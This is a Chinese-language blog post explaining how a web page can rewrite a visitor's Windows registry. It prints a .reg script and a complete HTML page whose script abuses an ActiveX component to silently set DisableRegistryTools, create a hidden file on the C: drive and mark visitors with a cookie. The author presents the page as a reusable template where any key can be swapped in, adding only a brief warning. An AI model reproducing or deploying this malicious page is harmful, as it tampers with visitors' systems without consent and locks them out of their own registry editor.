如何利用网页改写注册表

我们上网时常见到一些:"注册表被某某网站改写"或者"上了某某网站后,开机时会弹出对话框。"等等这一类的现象。其实,都只是一些网站利用简单的HTML编程改写注册表而实现的。那么现在,就让我们来对其作进一步的了解,看这究竟是怎么一回事儿!
不知大家对Windows系统注册表了解有多少?我们知道,在Windows系统下,我们可以编写注册表脚本文件『*.reg』来实现对注册表的改写。先让我们来看一个注册表脚本文件:
程序代码 程序代码

REGEDIT 4
[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System]
"DisableRegistryTools"=DWORD:00000001


不知大家看懂没?以上这个注册表脚本是锁住注册表编辑器。好了,注册表脚本编好了,再让我们看看怎样将其与HTML结合。
以下是一个HTML源码:

程序代码 程序代码

<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<SCRIPT language=****>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f()
{
try
{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
sh = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
fo = a1.GetObject();
if (documents.cookie.indexOf("km169set") == -1)
{
sh.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//System//DisableRegistryTools", 1,"REG_DWORD");
hd=fo.createTextFile();
hd.write();
hd.close();
file=fo.GetFile("c://yntop.htm");
file.Attributes=6;
var expdate = new Date((new Date()).getTime() + (1));
documents.cookie="km169set=km169; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{
}
}

function init()
{
setTimeout("f()", 1000);
}
init();</SCRIPT>
</HEAD>
</HTML>


我们注意到在上面这个HTML源码中,有一行:"HKCU//Software//Microsoft//Windows// CurrentVersion//Policies//System//DisableRegistryTools", 1,"REG_DWORD",拿这一行与上面那个注册表脚本比较一下,我们就可以发现,它们唯一的不同除了连接符不一样,还有书写格式的细小区别。但是这其中的区别不用我说也能够发现。下面我们来仔细看一下这段HTML源码中其他的一些语句。
相信大家都已经看出,这段HTML源码是利用****来实现对注册表的改写,其中最关键的一句也就是:

程序代码 程序代码

sh.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//System//DisableRegistryTools", 1,"REG_DWORD");


这也就是写入注册表的语句:sh.RegWrite。其格式为:"sh.RegWrite("注册表键",键值,"键值类型");"。如果大家要改,只要将括号里的内容改成自己的内容,其他的均可套用,作成一个最简单的网页。
好了,在这篇文章里,我只向大家介绍怎样编写一个简单的能改写注册表的网页,其他关于注册表的内容,我就不在这里详述了。最后毛窝要声明一点:本片文章内容有一定的危险,请大家慎重使用!
 
HTML页面修改注册表解密 -------------------------------------------------------------------------------- No. File Name Title Size 1 ActiveX技术综述.htm ActiveX技术综述 10K 2 IE恶意修改之终极解决方案.htm IE恶意修改之终极解决方案 10K 3 IE又一漏洞解.htm IE又一漏洞解 2K 4 IE在安装组件时候存在.htm IE在安装组件时候存在 2K 5 txt文件病毒.htm txt文件病毒 5K 6 Windows NT 4.htm Windows NT 4 3K 7 当心.htm 当心 10K 8 杜绝IE浏览的安全隐患.htm 杜绝IE浏览的安全隐患 5K 9 恶意修改IE的恢复方法.htm 恶意修改IE的恢复方法 5K 10 分析一个网站的恶意代码.htm 分析一个网站的恶意代码 20K 11 关于在浏览器中执行.htm 关于在浏览器中执行 5K 12 浏览网页注册表修改之迷及解决办法.htm 浏览网页注册表修改之迷及解决办法 8K 13 深入剖析恶意攻击性网页.htm 深入剖析恶意攻击性网页 22K 14 深入剖析通过嵌入ActiveXComponent执行ActiveX对象漏洞.htm 深入剖析通过嵌入ActiveXComponent执行ActiveX对象漏洞 18K 15 通过在html嵌入Javascript逃避hotmail过滤检查获得用户信息.htm 通过在html嵌入Javascript逃避hotmail过滤检查获得用户信息 4K 16 图解:摆脱可恶网站的阴影.htm 图解:摆脱可恶网站的阴影 17K 17 网页攻击教学.htm 网页攻击教学 3K 18 写网页病毒很容易.htm 写网页病毒很容易 3K 19 隐藏在网页中的程序.htm 隐藏在网页中的程序 3K 20 用脚本文件简单修改注册表.htm 用脚本文件简单修改注册表 8K 21 抓住网页恶意代码的黑手.htm 抓住网页恶意代码的黑手 19K
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值